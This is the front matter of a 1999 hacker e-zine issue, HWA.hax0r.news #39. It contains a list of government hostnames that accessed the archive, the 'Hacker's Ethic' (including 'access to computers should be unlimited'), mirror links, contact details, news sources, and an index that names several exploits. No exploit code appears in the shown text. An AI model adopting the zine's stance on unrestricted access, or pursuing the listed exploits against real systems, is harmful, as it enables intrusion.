    [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
  ==========================================================================
  =                       <=-[ HWA.hax0r.news ]-=>                         =
  ==========================================================================
    [=HWA'99=]                         Number 39 Volume 1 1999 Oct 24th  99
  ==========================================================================
    [                     61:20:6B:69:64:20:63:6F:75:                    ]
    [               6C:64:20:62:72:65:61:6B:20:74:68:69:73:              ]
    [              20:22:65:6E:63:72:79:70:74:69:6F:6E:22:!              ]        
  ==========================================================================

                         "ABUSUS NON TOLLIT USUM"
                         
  ==========================================================================                         
  
       Today the spotlight may be on you, some interesting machines that
                   have accessed these archives recently...
  
                             marshall.us-state.gov
                             digger1.defence.gov.au
                             firewall.mendoza.gov.ar
                             ipaccess.gov.ru
                             gatekeeper.itsec-debis.de
                             fgoscs.itsec-debis.de
                             fhu-ed4ccdf.fhu.disa.mil
                             citspr.tyndall.af.mil
                             kelsatx2.kelly.af.mil
                             kane.sheppard.af.mil                             
                             relay5.nima.mil
                             host.198-76-34-33.gsa.gov
                             ntsrvr.vsw.navy.mil
                             saic2.nosc.mil
                             wygate.wy.blm.gov
                             mrwilson.lanl.gov
                             p722ar.npt.nuwc.navy.mil
                             ws088228.ramstein.af.mil
                             car-gw.defence.gov.au
                             unknown-c-23-147.latimes.com
                             nytgate1.nytimes.com
                             
                             
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                                            
   
                     http://welcome.to/HWA.hax0r.news/                     
                     
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                                            
  
        Web site sponsored by CUBESOFT networks http://www.csoft.net
        check them out for great fast web hosting!
                    
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                       

     The Hacker's Ethic

     Sadly, due to the traditional ignorance and sensationalizing of the mass
     media, the once-noble term hacker has become a perjorative.
     
     Among true computer people, being called a hacker is a compliment. One of
     the traits of the true hacker is a profoundly antibureaucratic and
     democratic spirit. That spirit is best exemplified by the Hacker's Ethic.
     
     This ethic was best formulated by Steven Levy in his 1984 book Hackers:
     Heroes of the Computer Revolution. Its tenets are as follows:

      1 - Access to computers should be unlimited and total. 
      2 - All information should be free. 
      3 - Mistrust authority - promote decentralization. 
      4 - Hackers should be judged by their hacking not bogus criteria such as
          degrees, age, race, or position. 
      5 - You create art and beauty on a computer, 
      6 - Computers can change your life for the better. 

     The Internet as a whole reflects this ethic.


  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                       
  
               A Comment on FORMATTING: 
               
               
               Oct'99 - Started 80 column mode format, code is still left
                        untouched since formatting will destroy syntax.               
               
   
               I received an email recently about the formatting of this
               newsletter, suggesting that it be formatted to 75 columns
               in the past I've endevoured to format all text to 80 cols
               except for articles and site statements and urls which are
               posted verbatim, I've decided to continue with this method
               unless more people complain, the zine is best viewed in
               1024x768 mode with UEDIT.... - Ed
    
                       
  
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                       
                       


     New mirror sites
                
                http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
                http://net-security.org/hwahaxornews
                http://www.sysbreakers.com/hwa
                http://www.attrition.org/hosted/hwa/
                http://www.ducktank.net/hwa/issues.html.
                http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
                http://hwazine.cjb.net/
                http://www.hackunlimited.com/files/secu/papers/hwa/
                http://www.attrition.org/~modify/texts/zines/HWA/
                
              * http://hwa.hax0r.news.8m.com/           
              * http://www.fortunecity.com/skyscraper/feature/103/  
               
              * Crappy free sites but they offer 20M & I need the space...
              ** Some issues are not located on these sites since they exceed
                 the file size limitations imposed by the sites :-( please
                 only use these if no other recourse is available.
                        
                        
     
     HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
     thanks to airportman for the Cubesoft bandwidth. Also shouts out to all 
     our mirror sites! and p0lix for the (now expired) digitalgeeks archive
     tnx guys. 
     
     http://www.csoft.net/~hwa
     
     
     HWA.hax0r.news Mirror Sites:
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~
     http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
     http://www.attrition.org/hosted/hwa/
     http://www.attrition.org/~modify/texts/zines/HWA/
     http://www.ducktank.net/hwa/issues.html. ** NEW **
     http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
     http://www.csoft.net/~hwa/ 
     http://www.digitalgeeks.com/hwa. *DOWN*
     http://members.tripod.com/~hwa_2k
     http://welcome.to/HWA.hax0r.news/
     http://www.attrition.org/~modify/texts/zines/HWA/
     http://www.projectgamma.com/archives/zines/hwa/
     http://www.403-security.org/Htmls/hwa.hax0r.news.htm

   =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=         
   
   
  
   SYNOPSIS (READ THIS)
   --------------------
   
   The purpose of this newsletter is to 'digest' current events of interest
   that affect the online underground and netizens in general. This includes
   coverage of general security issues, hacks, exploits, underground news
   and anything else I think is worthy of a look see. (remember i'm doing
   this for me, not you, the fact some people happen to get a kick/use
   out of it is of secondary importance).

    This list is NOT meant as a replacement for, nor to compete with, the
   likes of publications such as CuD or PHRACK or with news sites such as
   AntiOnline, the Hacker News Network (HNN) or mailing lists such as
   BUGTRAQ or ISN nor could any other 'digest' of this type do so.

    It *is* intended  however, to  compliment such material and provide a
   reference to those who follow the culture by keeping tabs on as many
   sources as possible and providing links to further info, its a labour
   of love and will be continued for as long as I feel like it, i'm not
   motivated by dollars or the illusion of fame, did you ever notice how
   the most famous/infamous hackers are the ones that get caught? there's
   a lot to be said for remaining just outside the circle... <g>
   
   

   @HWA

   =-----------------------------------------------------------------------=

                     Welcome to HWA.hax0r.news ... #39

   =-----------------------------------------------------------------------=


    
    We could use some more people joining the channel, its usually pretty
    quiet, we don't bite (usually) so if you're hanging out on irc stop
    by and idle a while and say hi...   

    *******************************************************************
    ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
    ***                                                             ***
    *** please join to discuss or impart news on techno/phac scene  ***
    *** stuff or just to hang out ... someone is usually around 24/7***
    ***                                                             ***
    *** Note that the channel isn't there to entertain you its for  ***
    *** you to talk to us and impart news, if you're looking for fun***
    *** then do NOT join our channel try #weirdwigs or something... ***
    *** we're not #chatzone or #hack                                ***
    ***                                                             ***
    *******************************************************************


  =--------------------------------------------------------------------------=
  
  Issue #39
  =--------------------------------------------------------------------------=
  [ INDEX ]
  =--------------------------------------------------------------------------=
    Key     Intros                                                         
  =--------------------------------------------------------------------------=
 
    00.0  .. COPYRIGHTS ......................................................
    00.1  .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
    00.2  .. SOURCES .........................................................
    00.3  .. THIS IS WHO WE ARE ..............................................
    00.4  .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
    00.5  .. THE HWA_FAQ V1.0 ................................................
            
   `ABUSUS NON TOLLIT USUM'? This is (in case you hadn't guessed) Latin, and 
   loosely translated it means "Just because something is abused, it should 
   not be taken away from those  who use it properly). This is our new motto.         

  =--------------------------------------------------------------------------=
    Key     Content 
  =--------------------------------------------------------------------------=

    01.0  .. GREETS ..........................................................
     01.1 .. Last minute stuff, rumours, newsbytes ...........................
     01.2 .. Mailbag .........................................................
    02.0  .. From the Editor.................................................. 
    03.0  .. Exploit for Openlink's web configurator for Linux/glibc2.........
    04.0  .. sco_cancel.c yields egid=18(lp) Tested on SCO 5.0.5+Skunkware98..
    05.0  .. Smail + RPMmail Exploit..........................................
    06.0  .. ftpspy, ftp exploit..............................................
    07.0  .. A vulnerability exists in the /usr/lib/merge/dos7utils program...
    08.0  .. SCO OpenServer symlink vulnerability (Brock Tellier).............
    09.0  .. GREX  cyberspace.org - Free shell access.........................
    10.0  .. Shamrock Says it Was All A Lie ..................................
    11.0  .. China Fortifies Cyber Defenses ..................................
    12.0  .. Amnesty Program for Pirated Software Fails Miserably ............
    13.0  .. A New Look at InfoWar ...........................................
    14.0  .. Another Security Challenge ......................................
    15.0  .. University Shutdown After Attack ................................
    16.0  .. More Melissa Strains ............................................
    17.0  .. Loyalty Cards are Not As Private As People Think ................
    18.0  .. Interview With the Cult of the Dead Cow .........................
    19.0  .. Amazon.com Hosts Crypto Challenge ...............................
    20.0  .. Web Sites Cause Crime, Report Says ..............................
    21.0  .. China to Use Viruses During War .................................
    22.0  .. Call for Public Security Database ...............................
    23.0  .. GAO Calls for Security Laws .....................................
    24.0  .. RingZero Still on the Loose .....................................
    25.0  .. MTV Called Inexcusable By ITC ...................................
    26.0  .. Bush Web Site Defaced ...........................................
    27.0  .. Space Rogue, Editor of HNN, on ABC News Webcast Today ...........
    28.0  .. 20% of Hosts in Singapore Vulnerable ............................
    29.0  .. Zambia's First Computer Crime Trial .............................
    30.0  .. Russian Infowar Debunked ........................................
    31.0  .. Distributed Coordinated Attacks .................................
    32.0  .. Possible Network Intrusion Scenario .............................
    33.0  .. Intrusion Detection Provides A Pound Of Prevention ..............
    34.0  .. Advanced buffer overflow exploit Written by Taeho Oh.............
    35.0  .. UK Gov. Given Lifetime Menace Award .............................
    36.0  .. DOD Sys Admins Need Top Secret Clearance ........................
    37.0  .. Singapore Tough on Cyber Crime ..................................
    38.0  .. Student Poses as Teacher for Prank ..............................
    39.0  .. Axent Makes Outrageous Claims ...................................
    40.0  .. Where Do We Stand With Crypto ...................................
    41.0  .. Customs Service Uses Web to Catch Crooks ........................
    42.0  .. Virus and Marines Fight It Out In the Pentagon ..................
    43.0  .. LAPD Abuse Wiretapping Power ....................................
    44.0  .. Three Blind Men Await Trial in Israel For Computer Crime ........
    45.0  .. ARM Target of Cyber Attack ......................................
    46.0  .. Military Unit Formed For Domestic Deployment ....................
    47.0  .. cDc Interview Posted On Slashdot ................................
    48.0  .. Buffer Overflow in Communicator May Allow Code to Run ...........
    49.0  .. Listserver hacked................................................
    50.0  .. Skewl: "How a Netmask Works" By Steven Lee.......................
    51.0  .. More proxies supplied by IRC 4 ALL...............................
    52.0  .. Perl source for a webspoofing HTTP grabber.......................
    53.0  .. MACMILLAN USA MOVES TO SECURE LINUX..............................
    54.0  .. ANONYMOUS REMAILERS..............................................
    55.0  .. PROJECT GAMMA STILL DOWN.........................................
    56.0  .. PRIVATE DESKTOP..................................................
    57.0  .. Y2K RELATED DISASTER.............................................
    58.0  .. ANTI-MS SOFTWARE.................................................
    59.0  .. HOTMAIL: ANOTHER VULNERABILITY, THE SOAP CONTINUES...............
    60.0  .. Books: Hacking Exposed: Network Security Secrets and Solutions ..
    61.0  .. Microsoft Java Virtual Machine Class Cast Vulnerability..........
    62.0  .. OmniHTTPD Buffer Overflow Vulnerability..........................
    63.0  .. Linux cwdtools Vulnerabilities...................................
    64.0  .. WU-Ftpd NEW DoS vulnerabilty.....................................
    65.0  .. Axent Raptor Denial of Service Vulnerability.....................
    66.0  .. RedHat screen pty(7) Vulnerability...............................
    67.0  .. Microsoft Excel File Import Macro Execution Vulnerability........
    68.0  .. Checkpoint Firewall-1 LDAP Authentication Vulnerability..........           
    69.0  .. Microsoft Excel SYLK Macro Execution Vulnerability...............
    70.0  .. Wu-ftpd message Buffer Overflow Vulnerability....................
    71.0  .. Tribal Voice PowWow Password Vulnerabilities.....................
    72.0  .. RedHat lpr/lpd Vulnerabilities...................................
    73.0  .. Gauntlet Firewall Rules Bypass Vulnerability.....................
    74.0  .. Microsoft IE5 Javascript URL Redirection Vulnerability...........
    75.0  .. OpenLink 3.2 Remote Buffer Overflow Vulnerability................
    76.0  .. RedHat PAM NIS Locked Accounts Vulnerability.....................
    77.0  .. Microsoft IE5 IFRAME Vulnerability...............................
    78.0  .. SCO OpenServer 5.0.5 'userOsa' symlink Vulnerability.............
    79.0  .. ARE VIRUSES Y2K COMPLIANT?.......................................
    80.0  .. COMPUTER SECURITY AT CENTER OF DOE PROBLEMS......................
    81.0  .. US REVISITS SOURCE CODE LIMITS...................................
    82.0  .. SECURITY FOR AD-HOC WIRELESS NETWORKS............................
    83.0  .. GOV'T IT EXECS SEEK SOFTWARE ACCOUNTABILITY......................
    84.0  .. DEFAULT #7 OUT...................................................
    85.0  .. UK POLICE GETTING THE POWER TO TAP E-MAIL?.......................
    86.0  .. WASHINGTON DIVIDED ON NET SIGNATURES BILL........................
    87.0  .. FEDS STILL HAVING TROUBLE FINDING CYBERSECURITY..................
    88.0  .. CALIFORNIA TAKES DIGITAL SIGNATURES INTO USE.....................
    89.0  .. AMAZON'S CRYPTO CONTEST CRACKED WITHIN HOURS.....................
    90.0  .. SANS: CYBERSECURITY RISKS REAL ..................................
    91.0  .. "INTERVIEW" WITH MISTUH CLEAN....................................
    92.0  .. Inside Happy Hacker Oct 20th.....................................
    93.0  .. Security Focus Newsletter........................................
    94.0  .. THE TRINITY OF A QUALITY INFORMATION SECURITY PROGRAM v2.........
    
      
    =-------------------------------------------------------------------------------=
    
        
    AD.S  .. Post your site ads or etc here, if you can offer something in return
             thats tres cool, if not we'll consider ur ad anyways so send it in.
             ads for other zines are ok too btw just mention us in yours, please
             remember to include links and an email contact. Corporate ads will
             be considered also and if your company wishes to donate to or 
             participate in the upcoming Canc0n99 event send in your suggestions
             and ads now...n.b date and time may be pushed back join mailing list
             for up to date information.......................................
             Current dates: POSTPONED til further notice, place: TBA..........
    Ha.Ha .. Humour and puzzles  ............................................
              
              Hey You!........................................................
              =------=........................................................
              
              Send in humour for this section! I need a laugh and its hard to
              find good stuff... ;)...........................................

    SITE.1 .. Featured site, .................................................
     H.W   .. Hacked Websites  ...............................................
     A.0   .. APPENDICES......................................................
     A.1   .. PHACVW linx and references......................................
 
  =--------------------------------------------------------------------------=
     
     @HWA'99

     
 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

          THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
          OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
          WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
          (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
          READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
     
          Important semi-legalese and license to redistribute:
     
          YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
          AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
          ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
          IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
          APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
          IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
          ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
          ME PRIVATELY current email cruciphux@dok.org
     
          THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
          WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
          THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
     
          I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
          AND REDISTRIBUTE/MIRROR. - EoD
     
     
          Although this file and all future issues are now copyright, some of
         the content holds its  own copyright and these are printed and
         respected. News is news so i'll print any and all news but will quote
         sources when the source is known, if its good enough for CNN its good
         enough for me. And i'm doing it for free on my own time so pfffft. :)
     
         No monies are made or sought through the distribution of this material.
         If you have a problem or concern email me and we'll discuss it.
     
         cruciphux@dok.org
     
         Cruciphux [C*:.]



 00.1 CONTACT INFORMATION AND MAIL DROP
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
    Canada / North America (hell even if you are inside ..) and wish to
    send printed matter like newspaper clippings a subscription to your
    cool foreign hacking zine or photos, small non-explosive packages
    or sensitive information etc etc well, now you can. (w00t) please
    no more inflatable sheep or plastic dog droppings, or fake vomit
    thanks.

    Send all goodies to:
    

	    HWA NEWS
	    P.O BOX 44118
	    370 MAIN ST. NORTH
	    BRAMPTON, ONTARIO
	    CANADA
	    L6V 4H5

    WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
    ~~~~~~~  reading this from some interesting places, make my day and get a
             mention in the zine, send in a postcard, I realize that some places
             it is cost prohibitive but if you have the time and money be a cool
             dude / gal and send a poor guy a postcard preferably one that has some
             scenery from your place of residence for my collection, I collect stamps
             too so you kill two birds with one stone by being cool and mailing in a
             postcard, return address not necessary, just a  "hey guys being cool in
             Bahrain, take it easy" will do ... ;-) thanx.



    Ideas for interesting 'stuff' to send in apart from news:

    - Photo copies of old system manual front pages (optionally signed by you) ;-)
    - Photos of yourself, your mom, sister, dog and or cat in a NON
      compromising position plz I don't want pr0n. <g>
    - Picture postcards
    - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
      tapes with hack/security related archives, logs, irc logs etc on em.
    - audio or video cassettes of yourself/others etc of interesting phone
      fun or social engineering examples or transcripts thereof.
    
    
    Stuff you can email:
    
    - Prank phone calls in .ram or .mp* format
    - Fone tones and security announcements from PBX's etc
    - fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities)
    - reserved for one smiley face ->        :-)            <-
    - PHACV lists of files that you have or phac cd's you own (we have a burner, *g*)
    - burns of phac cds (email first to make sure we don't already have em)
    - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp*
    

    If you still can't think of anything you're probably not that interesting
    a person after all so don't worry about it <BeG>

    Our current email:

    Submissions/zine gossip.....: hwa@press.usmc.net
    Private email to editor.....: cruciphux@dok.org                                                                   
    Distribution/Website........: sas2@usa.net       

    Websites;
    
    sAs72.......................: http://members.tripod.com/~sAs72/
    Cruciphux...................: http://www.geocities.com/Area51/Lair/8913/

    @HWA



 00.2 Sources ***
      ~~~~~~~~~~~

     Sources can be some, all, or none of the following (by no means complete
    nor listed in any degree of importance) Unless otherwise noted, like msgs
    from lists or news from other sites, articles and information is compiled
    and or sourced by Cruciphux no copyright claimed.

    News & I/O zine ................. http://www.antionline.com/
    Back Orifice/cDc..................http://www.cultdeadcow.com/
    News site (HNN) .....,............http://www.hackernews.com/
    Help Net Security.................http://net-security.org/
    News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
    NewsTrolls .(daily news ).........http://www.newstrolls.com/
    News + Exploit archive ...........http://www.rootshell.com/beta/news.html
    CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
    News site+........................http://www.zdnet.com/
    News site+Security................http://www.gammaforce.org/
    News site+Security................http://www.projectgamma.com/
    News site+Security................http://securityhole.8m.com/
    News site+Security related site...http://www.403-security.org/  *DOWN*
    News/Humour site+ ................http://www.innerpulse.com
    News/Techie news site.............http://www.slashdot.org
    
    

    +Various mailing lists and some newsgroups, such as ...
    +other sites available on the HNN affiliates page, please see
     http://www.hackernews.com/affiliates.html as they seem to be popping up
     rather frequently ...

    
    http://www.the-project.org/ .. IRC list/admin archives
    http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk

    alt.hackers.malicious
    alt.hackers
    alt.2600
    BUGTRAQ
    ISN security mailing list
    ntbugtraq
    <+others>

    NEWS Agencies, News search engines etc:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    http://www.cnn.com/SEARCH/
       
    http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
        
    http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
        
    http://www.ottawacitizen.com/business/
        
    http://search.yahoo.com.sg/search/news_sg?p=hack
        
    http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
        
    http://www.zdnet.com/zdtv/cybercrime/
        
    http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
        
    NOTE: See appendices for details on other links.
    


    http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
        
    http://freespeech.org/eua/ Electronic Underground Affiliation
        
    http://ech0.cjb.net ech0 Security
    
    http://axon.jccc.net/hir/ Hackers Information Report
        
    http://net-security.org Net Security
        
    http://www.403-security.org Daily news and security related site
        

    Submissions/Hints/Tips/Etc
    ~~~~~~~~~~~~~~~~~~~~~~~~~~

    All submissions that are `published' are printed with the credits
    you provide, if no response is received by a week or two it is assumed
    that you don't care wether the article/email is to be used in an issue
    or not and may be used at my discretion.

    Looking for:

    Good news sites that are not already listed here OR on the HNN affiliates
    page at http://www.hackernews.com/affiliates.html

    Magazines (complete or just the articles) of breaking sekurity or hacker
    activity in your region, this includes telephone phraud and any other
    technological use, abuse hole or cool thingy. ;-) cut em out and send it
    to the drop box.


    - Ed

    Mailing List Subscription Info   (Far from complete)         Feb 1999
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~

    ISS Security mailing list faq : http://www.iss.net/iss/maillist.html


    THE MOST READ:

    BUGTRAQ - Subscription info
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~

    What is Bugtraq?

    Bugtraq is a full-disclosure UNIX security mailing list, (see the info
    file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
    bugtraq, send mail to listserv@netspace.org containing the message body
    subscribe bugtraq. I've been archiving this list on the web since late
    1993. It is searchable with glimpse and archived on-the-fly with hypermail.

    Searchable Hypermail Index;

          http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

          <a href="http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a>

    About the Bugtraq mailing list
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    The following comes from Bugtraq's info file:

    This list is for *detailed* discussion of UNIX security holes: what they are,
    how to exploit, and what to do to fix them.

    This list is not intended to be about cracking systems or exploiting their
    vulnerabilities. It is about defining, recognizing, and preventing use of
    security holes and risks.

    Please refrain from posting one-line messages or messages that do not contain
    any substance that can relate to this list`s charter.

    I will allow certain informational posts regarding updates to security tools,
    documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
    on this list.

    Please follow the below guidelines on what kind of information should be posted
    to the Bugtraq list:

    + Information on Unix related security holes/backdoors (past and present)
    + Exploit programs, scripts or detailed processes about the above
    + Patches, workarounds, fixes
    + Announcements, advisories or warnings
    + Ideas, future plans or current works dealing with Unix security
    + Information material regarding vendor contacts and procedures
    + Individual experiences in dealing with above vendors or security organizations
    + Incident advisories or informational reporting

    Any non-essential replies should not be directed to the list but to the originator of the message. Please do not
    "CC" the bugtraq reflector address if the response does not meet the above criteria.

    Remember: YOYOW.

    You own your own words. This means that you are responsible for the words that you post on this list and that
    reproduction of those words without your permission in any medium outside the distribution of this list may be
     challenged by you, the author.

    For questions or comments, please mail me:
    chasin@crimelab.com (Scott Chasin)
    
    
    UPDATED Sept/99 - Sent in by Androthi, tnx for the update
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    

      I am pleased to inform you of several changes that will be occurring
      on June 5th. I hope you find them as exciting as I do.
      
      
      BUGTRAQ moves to a new home
      ---------------------------
      
      
      First, BUGTRAQ will be moving from its current home at NETSPACE.ORG
      to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read
      below. Other than the change of domains nothing of how the list
      is run changes. I am still the moderator. We play by the same rules.
      
      
      Security Focus will be providing mail archives for BUGTRAQ. The
      archives go back longer than Netspace's and are more complete than
      Geek-Girl's.
      
      
      The move will occur one week from today. You will not need to
      resubscribe. All your information, including subscription options
      will be moved transparently.
      
      
      Any of you using mail filters (e.g. procmail) to sort incoming
      mail into mail folders by examining the From address will have to
      update them to include the new address. The new address will be:
      
      
                            BUGTRAQ@SECURITYFOCUS.COM
      
      
      Security Focus also be providing a free searchable vulnerability
      database.
      
      
      BUGTRAQ es muy bueno
      --------------------
      
      
      It has also become apparent that there is a need for forums
      in the spirit of BUGTRAQ where non-English speaking people
      or people that don't feel comfortable speaking English can
      exchange information.
      
      
      As such I've decided to give BUGTRAQ in other languages a try.
      BUGTRAQ will continue to be the place to submit vulnerability
      information, but if you feel more comfortable using some other
      language you can give the other lists a try. All relevant information
      from the other lists which have not already been covered here
      will be translated and forwarded on by the list moderator.
      
      
      In the next couple of weeks we will be introducing BUGTRAQ-JP
      (Japanese) which will be moderated by Nobuo Miwa <n-miwa@lac.co.jp>
      and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A.
      from Argentina <http://www.core-sdi.com/> (the folks that brought you
      Secure Syslog and the SSH insertion attack).
      
      
      What is Security Focus?
      -----------------------
      
      
      Security Focus is an exercise in creating a community and a security
      resource. We hope to be able to provide a medium where useful and
      successful resources such as BUGTRAQ can occur, while at the same
      time providing a comprehensive source of security information. Aside
      from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl
      herself!) have moved over to Security Focus to help us with building
      this new community. The other staff at Security Focus are largely derived
      from long time supporters of Bugtraq and the community in general. If
      you are interested in viewing the staff pages, please see the 'About'
      section on www.securityfocus.com.
      
      
      On the community creating front you will find a set of forums
      and mailing lists we hope you will find useful. A number of them
      are not scheduled to start for several weeks but starting today
      the following list is available:
      
      
      * Incidents' Mailing List. BUGTRAQ has always been about the
         discussion of new vulnerabilities. As such I normally don't approve
         messages about break-ins, trojans, viruses, etc with the exception
         of wide spread cases (Melissa, ADM worm, etc). The other choice
         people are usually left with is email CERT but this fails to
         communicate this important information to other that may be
         potentially affected.
      
      
         The Incidents mailing list is a lightly moderated mailing list to
         facilitate the quick exchange of security incident information.
         Topical items include such things as information about rootkits
         new trojan horses and viruses, source of attacks and tell-tale
         signs of intrusions.
      
      
         To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body
         of:
      
      
                   SUBS INCIDENTS FirstName, LastName
      
      
      Shortly we'll also be introducing an Information Warfare forum along
      with ten other forums over the next two months. These forums will be
      built and moderated by people in the community as well as vendors who
      are willing to take part in the community building process.
      *Note to the vendors here* We have several security vendors who have
      agreed to run forums where they can participate in the online communities.
      If you would like to take part as well, mail Alfred Huger,
      ahuger@securityfocus.com.
      
      
      On the information resource front you find a large database of
      the following:
      
      
      * Vulnerabilities. We are making accessible a free vulnerability
         database. You can search it by vendor, product and keyword. You
         will find detailed information on the vulnerability and how to fix it,
         as well are links to reference information such as email messages,
         advisories and web pages. You can search by vendor, product and
         keywords. The database itself is the result of culling through 5
         years of BUGTRAQ plus countless other lists and news groups. It's
         a shining example of how thorough full disclosure has made a significant
         impact on the industry over the last half decade.
      
      
      * Products. An incredible number of categorized security products
         from over two hundred different vendors.
      
      
      * Services. A large and focused directory of security services offered by
         vendors.
      
      
      * Books, Papers and Articles. A vast number of categorized security
         related books, papers and articles. Available to download directly
         for our servers when possible.
      
      
      * Tools. A large array of free security tools. Categorized and
         available for download.
      
      
      * News: A vast number of security news articles going all the way
         back to 1995.
      
      
      * Security Resources: A directory to other security resources on
         the net.
      
      
      As well as many other things such as an event calendar.
      
      
      For your convenience the home-page can be personalized to display
      only information you may be interested in. You can filter by
      categories, keywords and operating systems, as well as configure
      how much data to display.
      
      
      I'd like to thank the fine folks at NETSPACE for hosting the
      site for as long as they have. Their services have been invaluable.
      
      
      I hope you find these changes for the best and the new services
      useful. I invite you to visit http://www.securityfocus.com/ and
      check it out for yourself. If you have any comments or suggestions
      please feel free to contact me at this address or at
      aleph1@securityfocus.com.
      
      
      Cheers.
      
      
      --
      Aleph One / aleph1@underground.org
      http://underground.org/
      KeyID 1024/948FD6B5
      Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01
      



    
    Crypto-Gram
    ~~~~~~~~~~~

       CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
      insights, and commentaries on cryptography and computer security.

      To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
      blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
      visit http://www.counterpane.com/unsubform.html. Back issues are available
      on http://www.counterpane.com.

       CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
      Counterpane Systems, the author of "Applied Cryptography," and an inventor
      of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
      the International Association for Cryptologic Research, EPIC, and VTW. He
      is a frequent writer and lecturer on cryptography.


    CUD Computer Underground Digest
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    This info directly from their latest ish:

    Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09

 ISSN 1004-042X

 Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
 News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
 Archivist: Brendan Kehoe
 Poof Reader: Etaion Shrdlu, Jr.
 Shadow-Archivists: Dan Carosone / Paul Southworth
 Ralph Sims / Jyrki Kuoppala
 Ian Dickinson
 Cu Digest Homepage: http://www.soci.niu.edu/~cudigest



    [ISN] Security list
